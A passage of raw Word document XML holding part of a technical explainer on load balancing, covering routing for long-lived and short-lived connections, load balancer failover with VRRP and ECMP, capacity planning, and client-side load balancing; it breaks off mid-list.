    <w:p w14:paraId="194147F7" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Long-lived Connections — WebSockets, gRPC Streaming, SSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78729B4E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Connection count-based algorithms (least connections) fail for long-lived connections. A backend with 1,000 WebSocket connections that are all idle in a chat app has the same "connection count" as one with 1,000 WebSocket connections all streaming high-frequency financial data. The actual load is completely different.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCF19A" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D7AEF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request rate weighted routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Track requests-per-second per backend, not just connection count. Route to the backend with the lowest RPS. Works for gRPC streaming (where each stream generates many messages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B2026F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource-based routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Backends expose current resource utilization (CPU %, memory %) via their health check endpoint or a separate metrics endpoint. The LB polls these metrics and incorporates them into routing decisions. This directly measures actual load rather than proxying through connection count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C142D78" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent hashing for WebSockets:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Route WebSocket connections via consistent hashing on the user ID or session ID. This ensures a user's WebSocket connection always goes to the same backend, enabling server-side state (pub/sub, connection registries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2149EF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Short-lived Connections — HTTP APIs, Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E1AAE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>For very short requests (microseconds to milliseconds), the overhead of checking backend state per request becomes significant. </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P2C with random sampling</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> is optimal — O(1) overhead, statistically excellent distribution, no global state synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF282A4" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Concurrency limit as a load signal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Instead of tracking active connection count (which changes rapidly for short requests), track </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — requests currently being processed (started but not yet responded). This more accurately reflects instantaneous load for short-lived request workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348AAA1E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Batch/Background Workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AD00E3" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Queue-based load balancing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Instead of routing requests directly to backends, push work items into a queue (Kafka, SQS, Redis List). Backend workers </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pull</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve"> from the queue at their </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>own pace. This is the ultimate load balancing — workers only accept work when they're ready. No worker is ever overloaded beyond what it can handle. Natural backpressure — slow workers pull less, fast workers pull more. The queue absorbs traffic spikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7607E2F2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Work stealing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Multiple worker queues, one per backend. When a backend's queue is empty, it </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>steals</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> work from another backend's queue. This achieves excellent load distribution with minimal coordination overhead. Used by Go's goroutine scheduler, Java's ForkJoinPool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279A5FFE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="411CFB34">
          <v:rect id="_x0000_i2540" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68615356" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. The Load Balancer as a Failure Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6EFB1" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Load Balancer as Single Point of Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E65742" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>If you have one load balancer in front of 100 backends, the load balancer itself is a catastrophic single point of failure. Making the load balancer highly available is its own engineering problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AE3F7D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Passive LB pair:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Two load balancer instances. One is active (handles all traffic). One is passive (monitoring the active). They share a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virtual IP (VIP)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>. The VIP is associated with the active LB's NIC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC68751" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>If the active LB fails, </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VRRP (Virtual Router Redundancy Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keepalived</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> detects the failure (missed heartbeats) and the passive LB claims the VIP via a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gratuitous ARP broadcast</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — announcing to all hosts on the network that the VIP's MAC address has changed (to the passive LB's MAC). Hosts update their ARP caches. Traffic flows to the new active LB within </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3741DDEE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failover time:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Keepalived detects failure in ~3 seconds (3 missed heartbeats × 1 second interval). Gratuitous ARP propagates in &lt;1 second. Total: </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3–5 seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> of disruption. Existing TCP connections to the failed LB are broken — clients must reconnect. New connections immediately go to the new active LB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EBD371" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active LB cluster:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Multiple LB instances all handle traffic simultaneously. </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ECMP routing</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> at the upstream router distributes flows across all LB instances (hashing the 5-tuple). If one LB instance fails, ECMP removes it from the hash space — only connections that were hashing to the failed LB are affected. All other connections continue without interruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161B8A0B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t xml:space="preserve"> Connection state (connection tracking for L4 NAT, session persistence state for L7) is on the failed LB instance. Connections routed through the failed LB must re-establish. For L4, this means new TCP connections. For L7 with cookie-based stickiness, </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:lastRenderedPageBreak/>
        <w:t>the new LB re-reads the cookie and routes to the correct backend — usually transparent to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B825E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stateless L7 load balancers:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> If the L7 LB stores no persistent state (stateless architecture), any LB instance can handle any request. Session persistence is handled externally (Redis storing session-to-backend mappings). The LB cluster scales horizontally without shared state — just add more LB instances behind the ECMP router.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381516BB" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load Balancer Capacity Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15E1D2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The LB must handle </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>more connections than any single backend</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — it's the aggregation point for all traffic. LB capacity planning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84FF9F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connections per second:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Each new TCP connection consumes CPU (TCP handshake, TLS handshake for L7). A single Nginx instance handles ~100,000 connections/second. An eBPF-based L4 LB handles millions/second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F316F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Concurrent connections:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Each active connection consumes memory. An L7 LB needs ~10–100KB per connection (TLS state, request buffers, response buffers). 1 million concurrent connections × 50KB = 50GB RAM. This is why LB memory sizing matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C282B6B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput (bandwidth):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The LB must handle all traffic in and out. For L4 with DR mode (backends respond directly), the LB only handles inbound traffic. For L4 with NAT mode or L7, the LB handles both inbound and outbound — bandwidth doubles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C167545" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packet rate (PPS):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> For L4, the LB handles individual packets. A 10Gbps connection with 1500-byte packets = ~833,000 PPS. A 100Gbps LB handling 64-byte packets = ~200 million PPS. DPDK or XDP are required at this scale — the standard Linux kernel cannot process 200M PPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349DCA42" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="0FDDCCB1">
          <v:rect id="_x0000_i2541" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="246518ED" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Modern Load Balancing — Service Mesh and Client-Side Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5579F27F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Server-Side Load Balancing Has Limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4258C708" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Traditional load balancing puts the LB </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in the network path</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — all traffic flows through it. This creates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D85007" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth bottleneck:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> All traffic must fit through the LB's network interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F82F962" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Two extra network hops (client → LB → backend, backend → LB → client).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5DA19" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Operational complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The LB is infrastructure that must be provisioned, scaled, and maintained separately from the services it fronts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BACE572" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client-Side Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EB23B2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Move the load balancing logic </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>into the client</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>. The client directly connects to backends, applying load balancing algorithms locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C56956" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D66E3E1" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Client queries a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>service registry</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> (Consul, Kubernetes DNS, etcd) to get the list of healthy backend instances for the target service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F410E32" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Client applies a local load balancing algorithm (round robin, P2C, weighted) to select a backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA7DBC" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Client connects </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>directly</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> to the selected backend — no LB in the path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4692F3" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Client monitors response latencies and error rates to update its backend scoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8065A5" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Client polls the service registry periodically (or subscribes to updates) to detect backend additions/removals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC83DF6" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFDEA18" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zero extra hops:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Direct client-to-backend connections eliminate LB latency overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0A91DA" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Infinite horizontal scale:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Each client makes independent decisions — no central bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A5135" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rich load balancing signals:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> The client can make decisions based on application-level metrics (response time, error rate, current in-flight request count) rather than only connection count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A1F38" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C6D53" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
